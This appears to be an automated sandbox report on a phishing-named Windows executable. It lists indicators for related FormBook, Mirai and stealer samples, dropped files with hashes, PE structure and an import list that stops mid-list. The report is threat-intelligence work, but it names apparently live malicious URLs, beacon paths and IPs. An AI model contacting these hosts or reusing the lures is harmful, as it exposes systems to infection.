                                                PO-JST-270322.exeGet hashmaliciousFormBookBrowse
                                                • www.swartz.center/cxeo/?W8JpR=NCwLeJ3wUUFynVIDlrIOTEkbUfjyuckEvOuhcnpXuC/VMxxNC9IWNto61Dliak/bDV8d&YT=HhWDab
                                                Swift copy payment.exeGet hashmaliciousFormBookBrowse
                                                • www.pillarbox-studio.art/6dmq/?7nUdM=w8L0NF&j2=MsCITNO0KM/cL+AZR5CJ33SxI4+as8/LEdyyeYUf8lcPemOHhyKiBjEDDo5Wf6MgyNVH
                                                Revised Shipping Documents 385099_pdf.exeGet hashmaliciousFormBookBrowse
                                                • www.adornor.online/ns87/?TrThDXL=1XA65DX/vwdZYdcpYm6Xh14zlwfWFzy5EBfmposwpTord/i56WMVSv41xjOrUH7YB88D&GHeTN=f0GDyV1p1diLt
                                                FeDex Shipment Confirmation.exeGet hashmaliciousFormBookBrowse
                                                • www.nelly9800.com/09rb/?P6A=Jt/HrQrEbJEELsbO+qwZRBy+ZnkQGAsxDt3bRH6cGHQJq/1YwQ3KPn2IiPK+S8jX+qwt&JBZLXP=DxlDfVnX6PNt-
                                                SPECIFICATION REQUEST.exeGet hashmaliciousFormBookBrowse
                                                • www.firstbyphone.com/gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW0
                                                172.67.220.36DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                • www.supernutra01.online/jt56/?KV=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wfRdswz4Mf7fkXLX0rdEfHuvF7ynYddkbc+A=&Wno=a0qDq

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                www.supernutra01.onlineDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                • 172.67.220.36
                                                www.1secondlending.oneCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                • 43.205.198.29

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CSLDEHXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                • 159.25.16.28
                                                A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                • 194.245.148.189
                                                byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 194.245.150.252
                                                DHL TRACKING.exeGet hashmaliciousFormBookBrowse
                                                • 159.25.16.28
                                                19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                • 159.25.16.28
                                                Ricevuta_di_pagamento.vbsGet hashmaliciousGuLoaderBrowse
                                                • 159.25.16.28
                                                i586.elfGet hashmaliciousMiraiBrowse
                                                • 194.245.230.89
                                                na.elfGet hashmaliciousMiraiBrowse
                                                • 159.25.206.111
                                                BfQ121ipnz.elfGet hashmaliciousMiraiBrowse
                                                • 159.25.85.245
                                                5Jan3SztHt.elfGet hashmaliciousUnknownBrowse
                                                • 194.245.254.14
                                                LILLY-ASUSx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 40.195.63.236
                                                arm7.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 43.116.196.102
                                                arm5.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 43.201.74.246
                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 42.15.188.154
                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 43.26.26.86
                                                https://www.cbirc.gov.cn/cn/view/pages/index/index.htmlGet hashmaliciousUnknownBrowse
                                                • 43.152.28.111
                                                m68k.elfGet hashmaliciousMiraiBrowse
                                                • 40.192.210.17
                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                • 42.163.127.155
                                                arm4.elfGet hashmaliciousMiraiBrowse
                                                • 43.120.63.104
                                                x86_64.elfGet hashmaliciousMiraiBrowse
                                                • 43.125.153.101
                                                CLOUDFLARENETUSAdobeViewerPDQv2.msiGet hashmaliciousUnknownBrowse
                                                • 162.159.140.238
                                                Message_2579691_4.emlGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                Message_2605357.emlGet hashmaliciousUnknownBrowse
                                                • 104.21.95.6
                                                Documenti di spedizione 000293949040405959000.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                https://dorentop.es/yorii/Odrivex/Get hashmaliciousHTMLPhisherBrowse
                                                • 104.18.11.207
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.66.38
                                                https://vidrariamortagua.pt/index.php/es/inicio/Get hashmaliciousUnknownBrowse
                                                • 104.22.50.245
                                                https:/novembro-24.s3.us-east-2.amazonaws.com/FAT-Comprovativo_Novembro_hky_22-11-2024_21.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                • 1.1.1.1
                                                http://cdn-webstats.comGet hashmaliciousUnknownBrowse
                                                • 172.67.215.185
                                                https://start.searchmagiconline.com/nav?emid=0F8BFBFF00050657None421A96011&appId=1654513741549412&string_interpolation=GET_BRAND_NAMEGet hashmaliciousUnknownBrowse
                                                • 104.18.30.129
                                                COGENT-174USGameuxInstallHelper.DLL.dllGet hashmaliciousUnknownBrowse
                                                • 154.37.215.146
                                                f4s1Fhp8x7.exeGet hashmaliciousUnknownBrowse
                                                • 154.37.215.146
                                                f4s1Fhp8x7.exeGet hashmaliciousUnknownBrowse
                                                • 154.37.215.146
                                                GameuxInstallHelper.DLL.dllGet hashmaliciousUnknownBrowse
                                                • 154.37.215.146
                                                PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                • 38.47.232.124
                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 38.172.95.114
                                                arm.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 38.120.151.204
                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 38.217.51.222
                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                • 38.180.91.0
                                                Quotation.exeGet hashmaliciousFormBookBrowse
                                                • 38.47.232.124

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\320lF200

                                                Download File
                                                Process:C:\Windows\SysWOW64\powercfg.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                Category:dropped
                                                Size (bytes):114688
                                                Entropy (8bit):0.9746603542602881
                                                Encrypted:false
                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\anaboly

                                                Download File
                                                Process:C:\Users\user\Desktop\Project Breakdown Doc.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):289792
                                                Entropy (8bit):7.995252499439571
                                                Encrypted:true
                                                SSDEEP:6144:9qw8PRneE2gwmloAJWmKDw4kt7QyelNyERxeZsMgUkEf:9qw85pZV2AJQkiyelYMMgUkEf
                                                MD5:1C8E5B6F9CEA547A6BFF401F911104AC
                                                SHA1:964AD4D5FFCCBA0BAA1FDC644559D2BC16B7946C
                                                SHA-256:9F5DD0DE8BA6C85E9EC3573217FE074A8011B2879E562859ADF4E1A39839928A
                                                SHA-512:9D1BB11DF2DFF681BE708BED0BA213286ADF830284B87540FD9AF45CDE7D37C5C6C22894C4189C75D2EBAC11B6D7FDB10293A3D7EC3E6428012094AC23DC0BE1
                                                Malicious:false
                                                Reputation:low
                                                Preview:...6B1Z7A4DY..MS.GX7LWBG.6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMS.GX7BH.IC.H.{.Dx.x./$ r7*X+%#*cU _4X1.&<r58=r.6....g.Y%Tt:H>`YRGMSRG!6E..'$.|Q=.xT#.H..h'?.V...V&.@...x95..:1/eW+.BGC6A1Z7.qDY.FLS.\2aLWBGC6A1.7G5OXYGM.VGX7LWBGC6a%Z7E$DYR7ISRG.7LGBGC4A1\7E4DYRGKSRGX7LWB7G6A3Z7E4DYPG..RGH7LGBGC6Q1Z'E4DYRG]SRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGc'7?,7LW6.G6A!Z7En@YRWMSRGX7LWBGC6A1z7ETDYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4

                                                C:\Users\user\AppData\Local\Temp\autC5D4.tmp

                                                Download File
                                                Process:C:\Users\user\Desktop\Project Breakdown Doc.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):289792
                                                Entropy (8bit):7.995252499439571
                                                Encrypted:true
                                                SSDEEP:6144:9qw8PRneE2gwmloAJWmKDw4kt7QyelNyERxeZsMgUkEf:9qw85pZV2AJQkiyelYMMgUkEf
                                                MD5:1C8E5B6F9CEA547A6BFF401F911104AC
                                                SHA1:964AD4D5FFCCBA0BAA1FDC644559D2BC16B7946C
                                                SHA-256:9F5DD0DE8BA6C85E9EC3573217FE074A8011B2879E562859ADF4E1A39839928A
                                                SHA-512:9D1BB11DF2DFF681BE708BED0BA213286ADF830284B87540FD9AF45CDE7D37C5C6C22894C4189C75D2EBAC11B6D7FDB10293A3D7EC3E6428012094AC23DC0BE1
                                                Malicious:false
                                                Reputation:low
                                                Preview:...6B1Z7A4DY..MS.GX7LWBG.6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMS.GX7BH.IC.H.{.Dx.x./$ r7*X+%#*cU _4X1.&<r58=r.6....g.Y%Tt:H>`YRGMSRG!6E..'$.|Q=.xT#.H..h'?.V...V&.@...x95..:1/eW+.BGC6A1Z7.qDY.FLS.\2aLWBGC6A1.7G5OXYGM.VGX7LWBGC6a%Z7E$DYR7ISRG.7LGBGC4A1\7E4DYRGKSRGX7LWB7G6A3Z7E4DYPG..RGH7LGBGC6Q1Z'E4DYRG]SRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGc'7?,7LW6.G6A!Z7En@YRWMSRGX7LWBGC6A1z7ETDYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4DYRGMSRGX7LWBGC6A1Z7E4

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.201416370556976
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Project Breakdown Doc.exe
                                                File size:1'368'576 bytes
                                                MD5:bf7d24a56c64e6632ff2ca51f08908f8
                                                SHA1:428d664141dc9d2318dacdf51c4ac9efbbdd3847
                                                SHA256:ade930428485f335d9ab8526b0073be5cdf902c7316bf24bf86c69c85ed67d7e
                                                SHA512:dfbecaf21a3c59b0d3248dfb8fb603a321d2fa358d15466143a25ea907014b60182c70caa6395f3a0f0e24fe7662447431df00b8e628b3f50a8a4c4e73d66b2b
                                                SSDEEP:24576:OAHnh+eWsN3skA4RV1Hom2KXMmHa56GGVDLhD1vJVs9JAMu3E5:5h+ZkldoPK8Ya56GGx4bAM3
                                                TLSH:A955CF42A3D28031FFAB92335B66BB25567F7D699433951F12883C74BDB11B2123E623
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                File Icon

                                                Icon Hash:3121090929212160

                                                Static PE Info

                                                General

                                                Entrypoint:0x42800a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x673F1DEF [Thu Nov 21 11:47:59 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                Entrypoint Preview

                                                Instruction
                                                call 00007FB004EBD89Dh
                                                jmp 00007FB004EB0654h
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                int3
                                                push edi
                                                push esi
                                                mov esi, dword ptr [esp+10h]
                                                mov ecx, dword ptr [esp+14h]
                                                mov edi, dword ptr [esp+0Ch]
                                                mov eax, ecx
                                                mov edx, ecx
                                                add eax, esi
                                                cmp edi, esi
                                                jbe 00007FB004EB07DAh
                                                cmp edi, eax
                                                jc 00007FB004EB0B3Eh
                                                bt dword ptr [004C41FCh], 01h
                                                jnc 00007FB004EB07D9h
                                                rep movsb
                                                jmp 00007FB004EB0AECh
                                                cmp ecx, 00000080h
                                                jc 00007FB004EB09A4h
                                                mov eax, edi
                                                xor eax, esi
                                                test eax, 0000000Fh
                                                jne 00007FB004EB07E0h
                                                bt dword ptr [004BF324h], 01h
                                                jc 00007FB004EB0CB0h
                                                bt dword ptr [004C41FCh], 00000000h
                                                jnc 00007FB004EB097Dh
                                                test edi, 00000003h
                                                jne 00007FB004EB098Eh
                                                test esi, 00000003h
                                                jne 00007FB004EB096Dh
                                                bt edi, 02h
                                                jnc 00007FB004EB07DFh
                                                mov eax, dword ptr [esi]
                                                sub ecx, 04h
                                                lea esi, dword ptr [esi+04h]
                                                mov dword ptr [edi], eax
                                                lea edi, dword ptr [edi+04h]
                                                bt edi, 03h
                                                jnc 00007FB004EB07E3h
                                                movq xmm1, qword ptr [esi]
                                                sub ecx, 08h
                                                lea esi, dword ptr [esi+08h]
                                                movq qword ptr [edi], xmm1
                                                lea edi, dword ptr [edi+08h]
                                                test esi, 00000007h
                                                je 00007FB004EB0835h
                                                bt esi, 03h

                                                Rich Headers

                                                Programming Language:
                                                • [ASM] VS2013 build 21005
                                                • [ C ] VS2013 build 21005
                                                • [C++] VS2013 build 21005
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ASM] VS2013 UPD5 build 40629
                                                • [RES] VS2013 build 21005
                                                • [LNK] VS2013 UPD5 build 40629

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x83ad8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x14c0000x7134.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0xc80000x83ad80x83c002e6d95daed950489ad786eb3efd58cb7False0.8648804405834914data7.657876470096671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x14c0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xc85480x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                RT_ICON0xc86700x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                RT_ICON0xc87980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                RT_ICON0xc88c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/mEnglishGreat Britain0.47606382978723405
                                                RT_ICON0xc8d280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/mEnglishGreat Britain0.4120544090056285
                                                RT_ICON0xc9dd00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/mEnglishGreat Britain0.37572614107883817
                                                RT_ICON0xcc3780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/mEnglishGreat Britain0.36254133207368916
                                                RT_ICON0xd05a00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/mEnglishGreat Britain0.339701880988998
                                                RT_ICON0xe0dc80x16c88PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.998692670381483
                                                RT_MENU0xf7a500x50dataEnglishGreat Britain0.9
                                                RT_STRING0xf7aa00x594dataEnglishGreat Britain0.3333333333333333
                                                RT_STRING0xf80340x68adataEnglishGreat Britain0.2747909199522103
                                                RT_STRING0xf86c00x490dataEnglishGreat Britain0.3715753424657534
                                                RT_STRING0xf8b500x5fcdataEnglishGreat Britain0.3087467362924282
                                                RT_STRING0xf914c0x65cdataEnglishGreat Britain0.34336609336609336
                                                RT_STRING0xf97a80x466dataEnglishGreat Britain0.3605683836589698
                                                RT_STRING0xf9c100x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                RT_RCDATA0xf9d680x51809data1.0003325015801314
                                                RT_GROUP_ICON0x14b5740x5adataEnglishGreat Britain0.7888888888888889
                                                RT_GROUP_ICON0x14b5d00x14dataEnglishGreat Britain1.25
                                                RT_GROUP_ICON0x14b5e40x14dataEnglishGreat Britain1.15
                                                RT_GROUP_ICON0x14b5f80x14dataEnglishGreat Britain1.25
                                                RT_VERSION0x14b60c0xdcdataEnglishGreat Britain0.6181818181818182
                                                RT_MANIFEST0x14b6e80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                Imports

                                                DLLImport
                                                WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                PSAPI.DLLGetProcessMemoryInfo
                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                UxTheme.dllIsThemeActive
                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, 